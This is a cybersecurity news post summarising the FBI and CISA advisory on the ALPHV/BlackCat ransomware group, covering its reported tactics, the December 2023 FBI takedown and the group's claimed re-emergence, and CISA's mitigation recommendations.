On 19 December 2023, the FBI and CISA published a cyber security advisory to distribute IOCs and TTPs relating to the ALPHV/Blackcat RaaS.
To date, investigators from the Federal Bureau of Investigation have determined that the ALPHV (also known as BlackCat) ransomware gang have collected more than $300 million in ransom payments from at least 1,000 victims across the globe, as of September 2023. ‘ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations,’ the US government agency stated.
“As of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments.”
ALPHV / BlackCat Ransomware Group Tactics (TTP)
In order to gain initial access to a company, ALPHV Blackcat affiliates use advanced social engineering techniques and open-source research. Actors pose as IT and/or help desk staff and use phone calls or SMS messages to gain access to a network [T1586]. To communicate with victims and initiate processes to restore their encrypted files, ALPHV Blackcat affiliates use uniform resource locators (URLs).
As soon as ALPHV Blackcat affiliates gain access to victim networks, they deploy remote access software, such as AnyDesk, Mega Sync, and Splashtop, in preparation for data exfiltration. Plink and Ngrok [S0508] are legitimate tools ALPHV Blackcat affiliates use after gaining access to networks. ALPHV Blackcat affiliates claim to use Brute Ratel C4 [S1063] and Cobalt Strike [S1054] as beacons to command and control servers.
Evilginx2 is another open-source adversary-in-the-middle attack framework ALPHV Blackcat affiliates use to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. In addition, the actors are also able to obtain passwords from the domain controller, local network, and deleted backup servers.
ALPHV Blackcat administrators recently announced the ALPHV Blackcat Ransomware 2.0 Sphynx update in February 2023. As part of this update, more features have been added for affiliates, such as better defense evasion and additional tooling. With this ALPHV Blackcat update, Windows, Linux, and VMware devices can be encrypted.
FBI Announced ALPHV Blackcat Ransomware Takedown
Despite rumours about the takedown of his domain, on 19 December 2023, the FBI announced that it had taken control of the ALPHV ransomware servers, allowing them to monitor their traffic and obtain decryption keys. The FBI had access to ALPHV’s backed affiliate panel through the credentials of an affiliate, who served as a confidential human source (CHS) for the FBI.
After gaining access to the affiliate portal, the FBI stealthily spied on and monitored the ransomware operations closely for a couple of months. They collected all the necessary resources and evidence from the ransomware affiliate portal before breaking the ransomware operations. These resources included decryption keys, which allowed the FBI to help over 500 victims worldwide recover their files for free. This saved around $68 million in ransom demands. It’s possible the FBI exploited vulnerabilities that allowed the dumping of the ransomware gang’s database or further access to its servers.
Post takedown, a banner explaining that the seizure of ransomware operations emerged, mentioning that it was the result of an international law enforcement operation. This banner was added to the ransomware operation’s data leak domain.
Surprise Re-emergence of ALPHV/Blackcat Ransomware Group
However, in a surprising turn of events, on the same day, the ALPHV gang claimed that they had unseized the domain and released their data leak site hours later. In addition, ALPHV claims there are at least 3,400 victims have been compromised on their leak site.
As both the FBI and the ALPHV group possess the ransomware data leak website’s private keys, both of them are capable of taking control of the illicit domain from each other.
While this is going on, LockBit, another major ransomware-as-a-service (RaaS) group, offered ALPHV/Blackcat affiliates to join their gang.
CISA and FBI Guidance to Mitigate Ransomware Threats:
CISA and the FBI encourage critical infrastructure organizations to implement the mitigation recommendations in this CSA in order to reduce the likelihood and impact of ALPHV Blackcat ransomware attacks.
Here are some of CISA’s cyber security recommendations to mitigate the threat from ransomware attacks:
Routinely take inventory of assets and data to identify authorized and unauthorized devices and software.
Prioritize remediation of known exploited vulnerabilities.
Enable and enforce multifactor authentication with strong passwords.
Close unused ports and remove applications not deemed necessary for day-to-day operations.
For full cyber security advisory released by FBI and CISA, refer to #StopRansomware: ALPHV Blackcat | CISA
For more cybersecurity news and updates, follow us on Cybersecurity – The SOC Labs.
Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The SOC Labs assumes no liability for the accuracy or consequences of using this information.
Discover more from The SOC Labs
Subscribe to get the latest posts sent to your email.